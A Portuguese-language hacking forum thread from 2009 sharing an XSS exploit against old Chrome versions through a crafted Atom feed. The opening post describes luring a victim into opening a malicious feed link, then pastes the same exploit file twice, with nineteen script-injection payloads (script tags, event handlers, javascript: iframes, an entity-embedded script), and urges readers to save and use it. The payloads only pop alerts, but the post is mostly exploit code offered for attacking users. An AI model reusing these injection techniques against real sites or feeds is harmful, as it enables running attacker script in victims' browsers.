Unconfigured Ad Widget

Collapse

Anúncio

Collapse
No announcement yet.

[XPL] Chrome vulneravel a XSS

Collapse
X
Collapse
 
  • Page of 1
  • Filter
  • Tempo
  • Show
Clear All
new posts
Anterior template Avançar
  • Font Size
    #1

    Dica [XPL] Chrome vulneravel a XSS

    Olá turminha olha eu dinovo aqui pra enxer o saco de vocês...

    Bom recentemente postei um XPL na area de elite percuadiu bem as visitas lá... agora vim contribuir com todos aqueles que gostariam de ver mais um XPL

    Dessa vez esse é de ontem éé dia 15 de setembro foi lançado o XPL

    Vamos imaginar o cenário:
    uma vítima recebe o link de um RSS ou de um Feed , e abre com o Chrome, ela ctz vai visualizar o feed/rss (com um pouco de seing)

    Mas perae ! O link pode estar infectado

    e com um pouco de JavaScript a vitima se perde totalmente na pagina :\ (só lamento por isso)

    Olha como funcionaria o ataque:


    Putz que clicada do mal ein

    Para aqueles que querem o xpl
    Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
    ótimo, tenho o XPL, sei como funciona, mas ... e se eu cair numa dessas?

    Simples, atualiza seu Chrome para v3.0.195.21 ou maior.

    entao vai ta fixed já, como mostra a imagem a seguir:


    RSS por James Holderness e o Atom por James Snell
    só que só foi adaptado por "Inferno" para o Chrome

    Espero que tenham entendido, e gostado no minimo

    Mais algumas informações adicionais:
    Release Date : September 15, 2009
    CVE-ID : CVE-2009-XXXX (Chrome) {Pending}
    Severity : Medium to High
    Gostaria de falar que a mesma vulnerabilidade existe para Opera ... só que esse eu infelizmente não irei postar no momento

    Segue os codes abaixo
    googlechromexss.atom
    Código:
    <?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE feed [
<!ENTITY test1 "<script>javascript:alert('XSS #17')</script>">
]>
<feed>
  <title>XSS Tests for Google Chrome (v3.0.195.10, v2.0.172.43)</title>
  <contributor>
    <div>
      Tests originally developed by James Holderness for RSS and Atom by James Snell. 
      Adapted for Google Chrome by Inferno.
    </div>
  </contributor>

  <entry>
    <content type="xhtml"><div xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"><script>window.alert('XSS #1')</script></div></content>
  </entry>

  <entry>
    <content type="xhtml"><div xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"><script    

    x="x"    >

window.alert('XSS #2')

</script    

    ></div></content>
  </entry>

  <entry>
    <content type="xhtml"><div xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">&lt;<script>window.alert('XSS #3');//&lt;</script></div></content>
  </entry>

  <entry>
    <content type="xhtml"><div xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"><div onmouseover="window.alert('XSS #4');">Mouse over this text.</div></div></content>
  </entry>  

  <entry>
    <content type="xhtml"><div xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"><iframe src="javascript:window.alert('XSS #5')"></iframe></div></content>
  </entry>  

  <entry>
    <title type="xhtml"><div xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"><script>window.alert('XSS #6')</script></div></title>
  </entry>

  <entry>
    <title type="xhtml"><div xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"><script    

    x="x"    >

window.alert('Security Test #7')

</script    

    ></div></title>
  </entry>

  <entry>
    <title type="xhtml"><div xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">&lt;<script>window.alert('XSS #8');//&lt;</script></div></title>
  </entry>
    
  <entry>
    <title type="xhtml"><div xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"><iframe src="javascript:window.alert('XSS #9')"></iframe></div></title>
  </entry>

  <entry>
    <rights type="xhtml"><div xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"><script>window.alert('XSS #10')</script></div></rights>
  </entry>

  <entry>
    <rights type="xhtml"><div xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"><script    

    x="x"    >

window.alert('XSS #11')

</script    

    ></div></rights>
  </entry>
  
  <entry>
    <rights type="xhtml"><div xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"><iframe src="javascript:window.alert('XSS #12')"></iframe></div></rights>
  </entry>    

  <entry>
    <summary type="xhtml"><div xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"><script>window.alert('XSS #13')</script></div></summary>
  </entry>

  <entry>
    <summary type="xhtml"><div xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"><script    

    x="x"    >

window.alert('XSS #14')

</script    

    ></div></summary>
  </entry>

  <entry>
    <summary type="xhtml"><div xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">&lt;<script>window.alert('XSS #15');//&lt;</script></div></summary>
  </entry>  
  
  <entry>
    <summary type="xhtml"><div xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"><body onload="window.alert('XSS #16');"></body></div></summary>
  </entry>

  <entry>
    <summary type="xhtml"><div xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"><iframe src="javascript:window.alert('XSS #17')"></iframe></div></summary>
  </entry>
  
  <entry>
    <content type="xhtml"><div xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">&test1;</div></content>
  </entry>
  
  <entry>   
    <div xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"><script>alert('XSS #18');</script></div>
  </entry>
  
  <entry>
    <title type="xhtml"><div xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"><div onmouseover="window.alert('XSS #19');">Mouse over this text.</div></div></title>
  </entry>  
</feed>
    googlechromexss.atom.tx
    Código:
    <?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE feed [
<!ENTITY test1 "<script>javascript:alert('XSS #17')</script>">
]>
<feed>
  <title>XSS Tests for Google Chrome (v3.0.195.10, v2.0.172.43)</title>
  <contributor>
    <div>
      Tests originally developed by James Holderness for RSS and Atom by James Snell. 
      Adapted for Google Chrome by Inferno (Inferno).
    </div>
  </contributor>

  <entry>
    <content type="xhtml"><div xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"><script>window.alert('XSS #1')</script></div></content>
  </entry>

  <entry>
    <content type="xhtml"><div xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"><script    

    x="x"    >

window.alert('XSS #2')

</script    

    ></div></content>
  </entry>

  <entry>
    <content type="xhtml"><div xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">&lt;<script>window.alert('XSS #3');//&lt;</script></div></content>
  </entry>

  <entry>
    <content type="xhtml"><div xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"><div onmouseover="window.alert('XSS #4');">Mouse over this text.</div></div></content>
  </entry>  

  <entry>
    <content type="xhtml"><div xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"><iframe src="javascript:window.alert('XSS #5')"></iframe></div></content>
  </entry>  

  <entry>
    <title type="xhtml"><div xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"><script>window.alert('XSS #6')</script></div></title>
  </entry>

  <entry>
    <title type="xhtml"><div xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"><script    

    x="x"    >

window.alert('Security Test #7')

</script    

    ></div></title>
  </entry>

  <entry>
    <title type="xhtml"><div xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">&lt;<script>window.alert('XSS #8');//&lt;</script></div></title>
  </entry>
    
  <entry>
    <title type="xhtml"><div xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"><iframe src="javascript:window.alert('XSS #9')"></iframe></div></title>
  </entry>

  <entry>
    <rights type="xhtml"><div xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"><script>window.alert('XSS #10')</script></div></rights>
  </entry>

  <entry>
    <rights type="xhtml"><div xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"><script    

    x="x"    >

window.alert('XSS #11')

</script    

    ></div></rights>
  </entry>
  
  <entry>
    <rights type="xhtml"><div xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"><iframe src="javascript:window.alert('XSS #12')"></iframe></div></rights>
  </entry>    

  <entry>
    <summary type="xhtml"><div xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"><script>window.alert('XSS #13')</script></div></summary>
  </entry>

  <entry>
    <summary type="xhtml"><div xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"><script    

    x="x"    >

window.alert('XSS #14')

</script    

    ></div></summary>
  </entry>

  <entry>
    <summary type="xhtml"><div xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">&lt;<script>window.alert('XSS #15');//&lt;</script></div></summary>
  </entry>  
  
  <entry>
    <summary type="xhtml"><div xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"><body onload="window.alert('XSS #16');"></body></div></summary>
  </entry>

  <entry>
    <summary type="xhtml"><div xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"><iframe src="javascript:window.alert('XSS #17')"></iframe></div></summary>
  </entry>
  
  <entry>
    <content type="xhtml"><div xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">&test1;</div></content>
  </entry>
  
  <entry>   
    <div xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"><script>alert('XSS #18');</script></div>
  </entry>
  
  <entry>
    <title type="xhtml"><div xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"><div onmouseover="window.alert('XSS #19');">Mouse over this text.</div></div></title>
  </entry>  
</feed>
    Salve e aproveitem e usem
    Abraços.
    Last edited by RafaelVenancio; 16-09-2009, 12:51.
    Tags: Nenhum(a)
    • Top
  • Font Size
    #2
    Muito bom Guigo!!

    Uni os postes conforme o pedido!

    parabéns ae!
    Não te engane. De Deus não se zomba, o que o homem plantar, é o que ele vai colher. (Gálatas 6:7)


    sigpic


    • Top

    Comment

    Anterior template Avançar
    X
    Working...
    X